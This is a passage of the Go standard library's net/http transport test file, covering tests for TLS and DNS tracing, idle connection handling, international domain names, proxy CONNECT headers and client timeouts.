4056 logf("TLSHandshakeDone: ConnectionState = %v \n err = %v", s, err)
4057 },
4058 }
4059
4060 req, _ := NewRequest("GET", ts.URL, nil)
4061 req = req.WithContext(httptrace.WithClientTrace(context.Background(), trace))
4062 _, err := c.Do(req)
4063 if err == nil {
4064 t.Error("Expected request to fail TLS verification")
4065 }
4066
4067 mu.Lock()
4068 got := buf.String()
4069 mu.Unlock()
4070
4071 wantOnce := func(sub string) {
4072 if strings.Count(got, sub) != 1 {
4073 t.Errorf("expected substring %q exactly once in output.", sub)
4074 }
4075 }
4076
4077 wantOnce("TLSHandshakeStart")
4078 wantOnce("TLSHandshakeDone")
4079 wantOnce("err = x509: certificate is valid for example.com")
4080
4081 if t.Failed() {
4082 t.Errorf("Output:\n%s", got)
4083 }
4084 }
4085
4086 var (
4087 isDNSHijackedOnce sync.Once
4088 isDNSHijacked bool
4089 )
4090
4091 func skipIfDNSHijacked(t *testing.T) {
4092 // Skip this test if the user is using a shady/ISP
4093 // DNS server hijacking queries.
4094 // See issues 16732, 16716.
4095 isDNSHijackedOnce.Do(func() {
4096 addrs, _ := net.LookupHost("dns-should-not-resolve.golang")
4097 isDNSHijacked = len(addrs) != 0
4098 })
4099 if isDNSHijacked {
4100 t.Skip("skipping; test requires non-hijacking DNS server")
4101 }
4102 }
4103
4104 func TestTransportEventTraceRealDNS(t *testing.T) {
4105 skipIfDNSHijacked(t)
4106 defer afterTest(t)
4107 tr := &Transport{}
4108 defer tr.CloseIdleConnections()
4109 c := &Client{Transport: tr}
4110
4111 var mu sync.Mutex // guards buf
4112 var buf bytes.Buffer
4113 logf := func(format string, args ...interface{}) {
4114 mu.Lock()
4115 defer mu.Unlock()
4116 fmt.Fprintf(&buf, format, args...)
4117 buf.WriteByte('\n')
4118 }
4119
4120 req, _ := NewRequest("GET", "http://dns-should-not-resolve.golang:80", nil)
4121 trace := &httptrace.ClientTrace{
4122 DNSStart: func(e httptrace.DNSStartInfo) { logf("DNSStart: %+v", e) },
4123 DNSDone: func(e httptrace.DNSDoneInfo) { logf("DNSDone: %+v", e) },
4124 ConnectStart: func(network, addr string) { logf("ConnectStart: %s %s", network, addr) },
4125 ConnectDone: func(network, addr string, err error) { logf("ConnectDone: %s %s %v", network, addr, err) },
4126 }
4127 req = req.WithContext(httptrace.WithClientTrace(context.Background(), trace))
4128
4129 resp, err := c.Do(req)
4130 if err == nil {
4131 resp.Body.Close()
4132 t.Fatal("expected error during DNS lookup")
4133 }
4134
4135 mu.Lock()
4136 got := buf.String()
4137 mu.Unlock()
4138
4139 wantSub := func(sub string) {
4140 if !strings.Contains(got, sub) {
4141 t.Errorf("expected substring %q in output.", sub)
4142 }
4143 }
4144 wantSub("DNSStart: {Host:dns-should-not-resolve.golang}")
4145 wantSub("DNSDone: {Addrs:[] Err:")
4146 if strings.Contains(got, "ConnectStart") || strings.Contains(got, "ConnectDone") {
4147 t.Errorf("should not see Connect events")
4148 }
4149 if t.Failed() {
4150 t.Errorf("Output:\n%s", got)
4151 }
4152 }
4153
4154 // Issue 14353: port can only contain digits.
4155 func TestTransportRejectsAlphaPort(t *testing.T) {
4156 res, err := Get("http://dummy.tld:123foo/bar")
4157 if err == nil {
4158 res.Body.Close()
4159 t.Fatal("unexpected success")
4160 }
4161 ue, ok := err.(*url.Error)
4162 if !ok {
4163 t.Fatalf("got %#v; want *url.Error", err)
4164 }
4165 got := ue.Err.Error()
4166 want := `invalid URL port "123foo"`
4167 if got != want {
4168 t.Errorf("got error %q; want %q", got, want)
4169 }
4170 }
4171
4172 // Test the httptrace.TLSHandshake{Start,Done} hooks with a https http1
4173 // connections. The http2 test is done in TestTransportEventTrace_h2
4174 func TestTLSHandshakeTrace(t *testing.T) {
4175 defer afterTest(t)
4176 ts := httptest.NewTLSServer(HandlerFunc(func(w ResponseWriter, r *Request) {}))
4177 defer ts.Close()
4178
4179 var mu sync.Mutex
4180 var start, done bool
4181 trace := &httptrace.ClientTrace{
4182 TLSHandshakeStart: func() {
4183 mu.Lock()
4184 defer mu.Unlock()
4185 start = true
4186 },
4187 TLSHandshakeDone: func(s tls.ConnectionState, err error) {
4188 mu.Lock()
4189 defer mu.Unlock()
4190 done = true
4191 if err != nil {
4192 t.Fatal("Expected error to be nil but was:", err)
4193 }
4194 },
4195 }
4196
4197 c := ts.Client()
4198 req, err := NewRequest("GET", ts.URL, nil)
4199 if err != nil {
4200 t.Fatal("Unable to construct test request:", err)
4201 }
4202 req = req.WithContext(httptrace.WithClientTrace(req.Context(), trace))
4203
4204 r, err := c.Do(req)
4205 if err != nil {
4206 t.Fatal("Unexpected error making request:", err)
4207 }
4208 r.Body.Close()
4209 mu.Lock()
4210 defer mu.Unlock()
4211 if !start {
4212 t.Fatal("Expected TLSHandshakeStart to be called, but wasn't")
4213 }
4214 if !done {
4215 t.Fatal("Expected TLSHandshakeDone to be called, but wasnt't")
4216 }
4217 }
4218
4219 func TestTransportMaxIdleConns(t *testing.T) {
4220 defer afterTest(t)
4221 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
4222 // No body for convenience.
4223 }))
4224 defer ts.Close()
4225 c := ts.Client()
4226 tr := c.Transport.(*Transport)
4227 tr.MaxIdleConns = 4
4228
4229 ip, port, err := net.SplitHostPort(ts.Listener.Addr().String())
4230 if err != nil {
4231 t.Fatal(err)
4232 }
4233 ctx := context.WithValue(context.Background(), nettrace.LookupIPAltResolverKey{}, func(ctx context.Context, _, host string) ([]net.IPAddr, error) {
4234 return []net.IPAddr{{IP: net.ParseIP(ip)}}, nil
4235 })
4236
4237 hitHost := func(n int) {
4238 req, _ := NewRequest("GET", fmt.Sprintf("http://host-%d.dns-is-faked.golang:"+port, n), nil)
4239 req = req.WithContext(ctx)
4240 res, err := c.Do(req)
4241 if err != nil {
4242 t.Fatal(err)
4243 }
4244 res.Body.Close()
4245 }
4246 for i := 0; i < 4; i++ {
4247 hitHost(i)
4248 }
4249 want := []string{
4250 "|http|host-0.dns-is-faked.golang:" + port,
4251 "|http|host-1.dns-is-faked.golang:" + port,
4252 "|http|host-2.dns-is-faked.golang:" + port,
4253 "|http|host-3.dns-is-faked.golang:" + port,
4254 }
4255 if got := tr.IdleConnKeysForTesting(); !reflect.DeepEqual(got, want) {
4256 t.Fatalf("idle conn keys mismatch.\n got: %q\nwant: %q\n", got, want)
4257 }
4258
4259 // Now hitting the 5th host should kick out the first host:
4260 hitHost(4)
4261 want = []string{
4262 "|http|host-1.dns-is-faked.golang:" + port,
4263 "|http|host-2.dns-is-faked.golang:" + port,
4264 "|http|host-3.dns-is-faked.golang:" + port,
4265 "|http|host-4.dns-is-faked.golang:" + port,
4266 }
4267 if got := tr.IdleConnKeysForTesting(); !reflect.DeepEqual(got, want) {
4268 t.Fatalf("idle conn keys mismatch after 5th host.\n got: %q\nwant: %q\n", got, want)
4269 }
4270 }
4271
4272 func TestTransportIdleConnTimeout_h1(t *testing.T) { testTransportIdleConnTimeout(t, h1Mode) }
4273 func TestTransportIdleConnTimeout_h2(t *testing.T) { testTransportIdleConnTimeout(t, h2Mode) }
4274 func testTransportIdleConnTimeout(t *testing.T, h2 bool) {
4275 if testing.Short() {
4276 t.Skip("skipping in short mode")
4277 }
4278 defer afterTest(t)
4279
4280 const timeout = 1 * time.Second
4281
4282 cst := newClientServerTest(t, h2, HandlerFunc(func(w ResponseWriter, r *Request) {
4283 // No body for convenience.
4284 }))
4285 defer cst.close()
4286 tr := cst.tr
4287 tr.IdleConnTimeout = timeout
4288 defer tr.CloseIdleConnections()
4289 c := &Client{Transport: tr}
4290
4291 idleConns := func() []string {
4292 if h2 {
4293 return tr.IdleConnStrsForTesting_h2()
4294 } else {
4295 return tr.IdleConnStrsForTesting()
4296 }
4297 }
4298
4299 var conn string
4300 doReq := func(n int) {
4301 req, _ := NewRequest("GET", cst.ts.URL, nil)
4302 req = req.WithContext(httptrace.WithClientTrace(context.Background(), &httptrace.ClientTrace{
4303 PutIdleConn: func(err error) {
4304 if err != nil {
4305 t.Errorf("failed to keep idle conn: %v", err)
4306 }
4307 },
4308 }))
4309 res, err := c.Do(req)
4310 if err != nil {
4311 t.Fatal(err)
4312 }
4313 res.Body.Close()
4314 conns := idleConns()
4315 if len(conns) != 1 {
4316 t.Fatalf("req %v: unexpected number of idle conns: %q", n, conns)
4317 }
4318 if conn == "" {
4319 conn = conns[0]
4320 }
4321 if conn != conns[0] {
4322 t.Fatalf("req %v: cached connection changed; expected the same one throughout the test", n)
4323 }
4324 }
4325 for i := 0; i < 3; i++ {
4326 doReq(i)
4327 time.Sleep(timeout / 2)
4328 }
4329 time.Sleep(timeout * 3 / 2)
4330 if got := idleConns(); len(got) != 0 {
4331 t.Errorf("idle conns = %q; want none", got)
4332 }
4333 }
4334
4335 // Issue 16208: Go 1.7 crashed after Transport.IdleConnTimeout if an
4336 // HTTP/2 connection was established but its caller no longer
4337 // wanted it. (Assuming the connection cache was enabled, which it is
4338 // by default)
4339 //
4340 // This test reproduced the crash by setting the IdleConnTimeout low
4341 // (to make the test reasonable) and then making a request which is
4342 // canceled by the DialTLS hook, which then also waits to return the
4343 // real connection until after the RoundTrip saw the error. Then we
4344 // know the successful tls.Dial from DialTLS will need to go into the
4345 // idle pool. Then we give it a of time to explode.
4346 func TestIdleConnH2Crash(t *testing.T) {
4347 setParallel(t)
4348 cst := newClientServerTest(t, h2Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
4349 // nothing
4350 }))
4351 defer cst.close()
4352
4353 ctx, cancel := context.WithCancel(context.Background())
4354 defer cancel()
4355
4356 sawDoErr := make(chan bool, 1)
4357 testDone := make(chan struct{})
4358 defer close(testDone)
4359
4360 cst.tr.IdleConnTimeout = 5 * time.Millisecond
4361 cst.tr.DialTLS = func(network, addr string) (net.Conn, error) {
4362 c, err := tls.Dial(network, addr, &tls.Config{
4363 InsecureSkipVerify: true,
4364 NextProtos: []string{"h2"},
4365 })
4366 if err != nil {
4367 t.Error(err)
4368 return nil, err
4369 }
4370 if cs := c.ConnectionState(); cs.NegotiatedProtocol != "h2" {
4371 t.Errorf("protocol = %q; want %q", cs.NegotiatedProtocol, "h2")
4372 c.Close()
4373 return nil, errors.New("bogus")
4374 }
4375
4376 cancel()
4377
4378 failTimer := time.NewTimer(5 * time.Second)
4379 defer failTimer.Stop()
4380 select {
4381 case <-sawDoErr:
4382 case <-testDone:
4383 case <-failTimer.C:
4384 t.Error("timeout in DialTLS, waiting too long for cst.c.Do to fail")
4385 }
4386 return c, nil
4387 }
4388
4389 req, _ := NewRequest("GET", cst.ts.URL, nil)
4390 req = req.WithContext(ctx)
4391 res, err := cst.c.Do(req)
4392 if err == nil {
4393 res.Body.Close()
4394 t.Fatal("unexpected success")
4395 }
4396 sawDoErr <- true
4397
4398 // Wait for the explosion.
4399 time.Sleep(cst.tr.IdleConnTimeout * 10)
4400 }
4401
4402 type funcConn struct {
4403 net.Conn
4404 read func([]byte) (int, error)
4405 write func([]byte) (int, error)
4406 }
4407
4408 func (c funcConn) Read(p []byte) (int, error) { return c.read(p) }
4409 func (c funcConn) Write(p []byte) (int, error) { return c.write(p) }
4410 func (c funcConn) Close() error { return nil }
4411
4412 // Issue 16465: Transport.RoundTrip should return the raw net.Conn.Read error from Peek
4413 // back to the caller.
4414 func TestTransportReturnsPeekError(t *testing.T) {
4415 errValue := errors.New("specific error value")
4416
4417 wrote := make(chan struct{})
4418 var wroteOnce sync.Once
4419
4420 tr := &Transport{
4421 Dial: func(network, addr string) (net.Conn, error) {
4422 c := funcConn{
4423 read: func([]byte) (int, error) {
4424 <-wrote
4425 return 0, errValue
4426 },
4427 write: func(p []byte) (int, error) {
4428 wroteOnce.Do(func() { close(wrote) })
4429 return len(p), nil
4430 },
4431 }
4432 return c, nil
4433 },
4434 }
4435 _, err := tr.RoundTrip(httptest.NewRequest("GET", "http://fake.tld/", nil))
4436 if err != errValue {
4437 t.Errorf("error = %#v; want %v", err, errValue)
4438 }
4439 }
4440
4441 // Issue 13835: international domain names should work
4442 func TestTransportIDNA_h1(t *testing.T) { testTransportIDNA(t, h1Mode) }
4443 func TestTransportIDNA_h2(t *testing.T) { testTransportIDNA(t, h2Mode) }
4444 func testTransportIDNA(t *testing.T, h2 bool) {
4445 defer afterTest(t)
4446
4447 const uniDomain = "гофер.го"
4448 const punyDomain = "xn--c1ae0ajs.xn--c1aw"
4449
4450 var port string
4451 cst := newClientServerTest(t, h2, HandlerFunc(func(w ResponseWriter, r *Request) {
4452 want := punyDomain + ":" + port
4453 if r.Host != want {
4454 t.Errorf("Host header = %q; want %q", r.Host, want)
4455 }
4456 if h2 {
4457 if r.TLS == nil {
4458 t.Errorf("r.TLS == nil")
4459 } else if r.TLS.ServerName != punyDomain {
4460 t.Errorf("TLS.ServerName = %q; want %q", r.TLS.ServerName, punyDomain)
4461 }
4462 }
4463 w.Header().Set("Hit-Handler", "1")
4464 }))
4465 defer cst.close()
4466
4467 ip, port, err := net.SplitHostPort(cst.ts.Listener.Addr().String())
4468 if err != nil {
4469 t.Fatal(err)
4470 }
4471
4472 // Install a fake DNS server.
4473 ctx := context.WithValue(context.Background(), nettrace.LookupIPAltResolverKey{}, func(ctx context.Context, network, host string) ([]net.IPAddr, error) {
4474 if host != punyDomain {
4475 t.Errorf("got DNS host lookup for %q/%q; want %q", network, host, punyDomain)
4476 return nil, nil
4477 }
4478 return []net.IPAddr{{IP: net.ParseIP(ip)}}, nil
4479 })
4480
4481 req, _ := NewRequest("GET", cst.scheme()+"://"+uniDomain+":"+port, nil)
4482 trace := &httptrace.ClientTrace{
4483 GetConn: func(hostPort string) {
4484 want := net.JoinHostPort(punyDomain, port)
4485 if hostPort != want {
4486 t.Errorf("getting conn for %q; want %q", hostPort, want)
4487 }
4488 },
4489 DNSStart: func(e httptrace.DNSStartInfo) {
4490 if e.Host != punyDomain {
4491 t.Errorf("DNSStart Host = %q; want %q", e.Host, punyDomain)
4492 }
4493 },
4494 }
4495 req = req.WithContext(httptrace.WithClientTrace(ctx, trace))
4496
4497 res, err := cst.tr.RoundTrip(req)
4498 if err != nil {
4499 t.Fatal(err)
4500 }
4501 defer res.Body.Close()
4502 if res.Header.Get("Hit-Handler") != "1" {
4503 out, err := httputil.DumpResponse(res, true)
4504 if err != nil {
4505 t.Fatal(err)
4506 }
4507 t.Errorf("Response body wasn't from Handler. Got:\n%s\n", out)
4508 }
4509 }
4510
4511 // Issue 13290: send User-Agent in proxy CONNECT
4512 func TestTransportProxyConnectHeader(t *testing.T) {
4513 defer afterTest(t)
4514 reqc := make(chan *Request, 1)
4515 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
4516 if r.Method != "CONNECT" {
4517 t.Errorf("method = %q; want CONNECT", r.Method)
4518 }
4519 reqc <- r
4520 c, _, err := w.(Hijacker).Hijack()
4521 if err != nil {
4522 t.Errorf("Hijack: %v", err)
4523 return
4524 }
4525 c.Close()
4526 }))
4527 defer ts.Close()
4528
4529 c := ts.Client()
4530 c.Transport.(*Transport).Proxy = func(r *Request) (*url.URL, error) {
4531 return url.Parse(ts.URL)
4532 }
4533 c.Transport.(*Transport).ProxyConnectHeader = Header{
4534 "User-Agent": {"foo"},
4535 "Other": {"bar"},
4536 }
4537
4538 res, err := c.Get("https://dummy.tld/") // https to force a CONNECT
4539 if err == nil {
4540 res.Body.Close()
4541 t.Errorf("unexpected success")
4542 }
4543 select {
4544 case <-time.After(3 * time.Second):
4545 t.Fatal("timeout")
4546 case r := <-reqc:
4547 if got, want := r.Header.Get("User-Agent"), "foo"; got != want {
4548 t.Errorf("CONNECT request User-Agent = %q; want %q", got, want)
4549 }
4550 if got, want := r.Header.Get("Other"), "bar"; got != want {
4551 t.Errorf("CONNECT request Other = %q; want %q", got, want)
4552 }
4553 }
4554 }
4555
4556 var errFakeRoundTrip = errors.New("fake roundtrip")
4557
4558 type funcRoundTripper func()
4559
4560 func (fn funcRoundTripper) RoundTrip(*Request) (*Response, error) {
4561 fn()
4562 return nil, errFakeRoundTrip
4563 }
4564
4565 func wantBody(res *Response, err error, want string) error {
4566 if err != nil {
4567 return err
4568 }
4569 slurp, err := ioutil.ReadAll(res.Body)
4570 if err != nil {
4571 return fmt.Errorf("error reading body: %v", err)
4572 }
4573 if string(slurp) != want {
4574 return fmt.Errorf("body = %q; want %q", slurp, want)
4575 }
4576 if err := res.Body.Close(); err != nil {
4577 return fmt.Errorf("body Close = %v", err)
4578 }
4579 return nil
4580 }
4581
4582 func newLocalListener(t *testing.T) net.Listener {
4583 ln, err := net.Listen("tcp", "127.0.0.1:0")
4584 if err != nil {
4585 ln, err = net.Listen("tcp6", "[::1]:0")
4586 }
4587 if err != nil {
4588 t.Fatal(err)
4589 }
4590 return ln
4591 }
4592
4593 type countCloseReader struct {
4594 n *int
4595 io.Reader
4596 }
4597
4598 func (cr countCloseReader) Close() error {
4599 (*cr.n)++
4600 return nil
4601 }
4602
4603 // rgz is a gzip quine that uncompresses to itself.
4604 var rgz = []byte{
4605 0x1f, 0x8b, 0x08, 0x08, 0x00, 0x00, 0x00, 0x00,
4606 0x00, 0x00, 0x72, 0x65, 0x63, 0x75, 0x72, 0x73,
4607 0x69, 0x76, 0x65, 0x00, 0x92, 0xef, 0xe6, 0xe0,
4608 0x60, 0x00, 0x83, 0xa2, 0xd4, 0xe4, 0xd2, 0xa2,
4609 0xe2, 0xcc, 0xb2, 0x54, 0x06, 0x00, 0x00, 0x17,
4610 0x00, 0xe8, 0xff, 0x92, 0xef, 0xe6, 0xe0, 0x60,
4611 0x00, 0x83, 0xa2, 0xd4, 0xe4, 0xd2, 0xa2, 0xe2,
4612 0xcc, 0xb2, 0x54, 0x06, 0x00, 0x00, 0x17, 0x00,
4613 0xe8, 0xff, 0x42, 0x12, 0x46, 0x16, 0x06, 0x00,
4614 0x05, 0x00, 0xfa, 0xff, 0x42, 0x12, 0x46, 0x16,
4615 0x06, 0x00, 0x05, 0x00, 0xfa, 0xff, 0x00, 0x05,
4616 0x00, 0xfa, 0xff, 0x00, 0x14, 0x00, 0xeb, 0xff,
4617 0x42, 0x12, 0x46, 0x16, 0x06, 0x00, 0x05, 0x00,
4618 0xfa, 0xff, 0x00, 0x05, 0x00, 0xfa, 0xff, 0x00,
4619 0x14, 0x00, 0xeb, 0xff, 0x42, 0x88, 0x21, 0xc4,
4620 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff, 0x42, 0x88,
4621 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff,
4622 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00,
4623 0xeb, 0xff, 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00,
4624 0x14, 0x00, 0xeb, 0xff, 0x42, 0x88, 0x21, 0xc4,
4625 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00,
4626 0x00, 0xff, 0xff, 0x00, 0x17, 0x00, 0xe8, 0xff,
4627 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x00, 0x00,
4628 0xff, 0xff, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00,
4629 0x17, 0x00, 0xe8, 0xff, 0x42, 0x12, 0x46, 0x16,
4630 0x06, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x08,
4631 0x00, 0xf7, 0xff, 0x3d, 0xb1, 0x20, 0x85, 0xfa,
4632 0x00, 0x00, 0x00, 0x42, 0x12, 0x46, 0x16, 0x06,
4633 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x08, 0x00,
4634 0xf7, 0xff, 0x3d, 0xb1, 0x20, 0x85, 0xfa, 0x00,
4635 0x00, 0x00, 0x3d, 0xb1, 0x20, 0x85, 0xfa, 0x00,
4636 0x00, 0x00,
4637 }
4638
4639 // Ensure that a missing status doesn't make the server panic
4640 // See Issue https://golang.org/issues/21701
4641 func TestMissingStatusNoPanic(t *testing.T) {
4642 t.Parallel()
4643
4644 const want = "unknown status code"
4645
4646 ln := newLocalListener(t)
4647 addr := ln.Addr().String()
4648 shutdown := make(chan bool, 1)
4649 done := make(chan bool)
4650 fullAddrURL := fmt.Sprintf("http://%s", addr)
4651 raw := "HTTP/1.1 400\r\n" +
4652 "Date: Wed, 30 Aug 2017 19:09:27 GMT\r\n" +
4653 "Content-Type: text/html; charset=utf-8\r\n" +
4654 "Content-Length: 10\r\n" +
4655 "Last-Modified: Wed, 30 Aug 2017 19:02:02 GMT\r\n" +
4656 "Vary: Accept-Encoding\r\n\r\n" +
4657 "Aloha Olaa"
4658
4659 go func() {
4660 defer func() {
4661 ln.Close()
4662 close(done)
4663 }()
4664
4665 conn, _ := ln.Accept()
4666 if conn != nil {
4667 io.WriteString(conn, raw)
4668 ioutil.ReadAll(conn)
4669 conn.Close()
4670 }
4671 }()
4672
4673 proxyURL, err := url.Parse(fullAddrURL)
4674 if err != nil {
4675 t.Fatalf("proxyURL: %v", err)
4676 }
4677
4678 tr := &Transport{Proxy: ProxyURL(proxyURL)}
4679
4680 req, _ := NewRequest("GET", "https://golang.org/", nil)
4681 res, err, panicked := doFetchCheckPanic(tr, req)
4682 if panicked {
4683 t.Error("panicked, expecting an error")
4684 }
4685 if res != nil && res.Body != nil {
4686 io.Copy(ioutil.Discard, res.Body)
4687 res.Body.Close()
4688 }
4689
4690 if err == nil || !strings.Contains(err.Error(), want) {
4691 t.Errorf("got=%v want=%q", err, want)
4692 }
4693
4694 close(shutdown)
4695 <-done
4696 }
4697
4698 func doFetchCheckPanic(tr *Transport, req *Request) (res *Response, err error, panicked bool) {
4699 defer func() {
4700 if r := recover(); r != nil {
4701 panicked = true
4702 }
4703 }()
4704 res, err = tr.RoundTrip(req)
4705 return
4706 }
4707
4708 // Issue 22330: do not allow the response body to be read when the status code
4709 // forbids a response body.
4710 func TestNoBodyOnChunked304Response(t *testing.T) {
4711 defer afterTest(t)
4712 cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
4713 conn, buf, _ := w.(Hijacker).Hijack()
4714 buf.Write([]byte("HTTP/1.1 304 NOT MODIFIED\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n"))
4715 buf.Flush()
4716 conn.Close()
4717 }))
4718 defer cst.close()
4719
4720 // Our test server above is sending back bogus data after the
4721 // response (the "0\r\n\r\n" part), which causes the Transport
4722 // code to log spam. Disable keep-alives so we never even try
4723 // to reuse the connection.
4724 cst.tr.DisableKeepAlives = true
4725
4726 res, err := cst.c.Get(cst.ts.URL)
4727 if err != nil {
4728 t.Fatal(err)
4729 }
4730
4731 if res.Body != NoBody {
4732 t.Errorf("Unexpected body on 304 response")
4733 }
4734 }
4735
4736 type funcWriter func([]byte) (int, error)
4737
4738 func (f funcWriter) Write(p []byte) (int, error) { return f(p) }
4739
4740 type doneContext struct {
4741 context.Context
4742 err error
4743 }
4744
4745 func (doneContext) Done() <-chan struct{} {
4746 c := make(chan struct{})
4747 close(c)
4748 return c
4749 }
4750
4751 func (d doneContext) Err() error { return d.err }
4752
4753 // Issue 25852: Transport should check whether Context is done early.
4754 func TestTransportCheckContextDoneEarly(t *testing.T) {
4755 tr := &Transport{}
4756 req, _ := NewRequest("GET", "http://fake.example/", nil)
4757 wantErr := errors.New("some error")
4758 req = req.WithContext(doneContext{context.Background(), wantErr})
4759 _, err := tr.RoundTrip(req)
4760 if err != wantErr {
4761 t.Errorf("error = %v; want %v", err, wantErr)
4762 }
4763 }
4764
4765 // Issue 23399: verify that if a client request times out, the Transport's
4766 // conn is closed so that it's not reused.
4767 //
4768 // This is the test variant that times out before the server replies with
4769 // any response headers.
4770 func TestClientTimeoutKillsConn_BeforeHeaders(t *testing.T) {
4771 setParallel(t)
4772 defer afterTest(t)
4773 inHandler := make(chan net.Conn, 1)
4774 handlerReadReturned := make(chan bool, 1)
4775 cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
4776 conn, _, err := w.(Hijacker).Hijack()
4777 if err != nil {
4778 t.Error(err)
4779 return
4780 }
4781 inHandler <- conn
4782 n, err := conn.Read([]byte{0})
4783 if n != 0 || err != io.EOF {
4784 t.Errorf("unexpected Read result: %v, %v", n, err)
4785 }
4786 handlerReadReturned <- true
4787 }))
4788 defer cst.close()
4789
4790 const timeout = 50 * time.Millisecond
4791 cst.c.Timeout = timeout
4792
4793 _, err := cst.c.Get(cst.ts.URL)
4794 if err == nil {
4795 t.Fatal("unexpected Get succeess")
4796 }
4797
4798 select {
4799 case c := <-inHandler:
4800 select {
4801 case <-handlerReadReturned:
4802 // Success.
4803 return
4804 case <-time.After(5 * time.Second):
4805 t.Error("Handler's conn.Read seems to be stuck in Read")
4806 c.Close() // close it to unblock Handler
4807 }
4808 case <-time.After(timeout * 10):
4809 // If we didn't get into the Handler in 50ms, that probably means
4810 // the builder was just slow and the Get failed in that time
4811 // but never made it to the server. That's fine. We'll usually
4812 // test the part above on faster machines.
4813 t.Skip("skipping test on slow builder")
4814 }
4815 }
4816
4817 // Issue 23399: verify that if a client request times out, the Transport's
4818 // conn is closed so that it's not reused.
4819 //
4820 // This is the test variant that has the server send response headers
4821 // first, and time out during the write of the response body.
4822 func TestClientTimeoutKillsConn_AfterHeaders(t *testing.T) {
4823 setParallel(t)
4824 defer afterTest(t)
4825 inHandler := make(chan net.Conn, 1)
4826 handlerResult := make(chan error, 1)
4827 cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
4828 w.Header().Set("Content-Length", "100")
4829 w.(Flusher).Flush()
4830 conn, _, err := w.(Hijacker).Hijack()
4831 if err != nil {
4832 t.Error(err)
4833 return
4834 }
4835 conn.Write([]byte("foo"))
4836 inHandler <- conn
4837 n, err := conn.Read([]byte{0})
4838 // The error should be io.EOF or "read tcp
4839 // 127.0.0.1:35827->127.0.0.1:40290: read: connection
4840 // reset by peer" depending on timing. Really we just
4841 // care that it returns at all. But if it returns with
4842 // data, that's weird.
4843 if n != 0 || err == nil {
4844 handlerResult <- fmt.Errorf("unexpected Read result: %v, %v", n, err)
4845 return
4846 }
4847 handlerResult <- nil
4848 }))
4849 defer cst.close()
4850
4851 // Set Timeout to something very long but non-zero to exercise
4852 // the codepaths that check for it. But rather than wait for it to fire
4853 // (which would make the test slow), we send on the req.Cancel channel instead,
4854 // which happens to exercise the same code paths.
4855 cst.c.Timeout = time.Minute // just to be non-zero, not to hit it.
4856 req, _ := NewRequest("GET", cst.ts.URL, nil)
4857 cancel := make(chan struct{})
4858 req.Cancel = cancel
4859
4860 res, err := cst.c.Do(req)
4861 if err != nil {
4862 select {
4863 case <-inHandler:
4864 t.Fatalf("Get error: %v", err)
4865 default:
4866 // Failed before entering handler. Ignore result.
4867 t.Skip("skipping test on slow builder")
4868 }
4869 }
4870
4871 close(cancel)
4872 got, err := ioutil.ReadAll(res.Body)
4873 if err == nil {
4874 t.Fatalf("unexpected success; read %q, nil", got)
4875 }
4876
4877 select {
4878 case c := <-inHandler:
4879 select {
4880 case err := <-handlerResult:
4881 if err != nil {
4882 t.Errorf("handler: %v", err)
4883 }
4884 return
4885 case <-time.After(5 * time.Second):
4886 t.Error("Handler's conn.Read seems to be stuck in Read")
4887 c.Close() // close it to unblock Handler
4888 }
4889 case <-time.After(5 * time.Second):
4890 t.Fatal("timeout")
4891 }
4892 }
4893
4894 func TestTransportResponseBodyWritableOnProtocolSwitch(t *testing.T) {
4895 setParallel(t)
4896 defer afterTest(t)
4897 done := make(chan struct{})
4898 defer close(done)
4899 cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
4900 conn, _, err := w.(Hijacker).Hijack()
4901 if err != nil {
4902 t.Error(err)
4903 return
4904 }
4905 defer conn.Close()
4906 io.WriteString(conn, "HTTP/1.1 101 Switching Protocols Hi\r\nConnection: upgRADe\r\nUpgrade: foo\r\n\r\nSome buffered data\n")
4907 bs := bufio.NewScanner(conn)
4908 bs.Scan()
4909 fmt.Fprintf(conn, "%s\n", strings.ToUpper(bs.Text()))
4910 <-done
4911 }))
4912 defer cst.close()
4913
4914 req, _ := NewRequest("GET", cst.ts.URL, nil)
4915 req.Header.Set("Upgrade", "foo")
4916 req.Header.Set("Connection", "upgrade")
4917 res, err := cst.c.Do(req)
4918 if err != nil {
4919 t.Fatal(err)
4920 }
4921 if res.StatusCode != 101 {
4922 t.Fatalf("expected 101 switching protocols; got %v, %v", res.Status, res.Header)
4923 }
4924 rwc, ok := res.Body.(io.ReadWriteCloser)
4925 if !ok {
4926 t.Fatalf("expected a ReadWriteCloser; got a %T", res.Body)
4927 }
4928 defer rwc.Close()
4929 bs := bufio.NewScanner(rwc)
4930 if !bs.Scan() {
4931 t.Fatalf("expected readable input")
4932 }
4933 if got, want := bs.Text(), "Some buffered data"; got != want {
4934 t.Errorf("read %q; want %q", got, want)
4935 }
4936 io.WriteString(rwc, "echo\n")
4937 if !bs.Scan() {
4938 t.Fatalf("expected another line")
4939 }
4940 if got, want := bs.Text(), "ECHO"; got != want {
4941 t.Errorf("read %q; want %q", got, want)
4942 }
4943 }
4944
4945 func TestTransportCONNECTBidi(t *testing.T) {
4946 defer afterTest(t)
4947 const target = "backend:443"
4948 cst := newClientServerTest(t, h1Mode, HandlerFunc(func(w ResponseWriter, r *Request) {
4949 if r.Method != "CONNECT" {
4950 t.Errorf("unexpected method %q", r.Method)
4951 w.WriteHeader(500)
4952 return
4953 }
4954 if r.RequestURI != target {
4955 t.Errorf("unexpected CONNECT target %q", r.RequestURI)
4956 w.WriteHeader(500)
4957 return
4958 }
4959 nc, brw, err := w.(Hijacker).Hijack()
4960 if err != nil {
4961 t.Error(err)
4962 return
4963 }
4964 defer nc.Close()
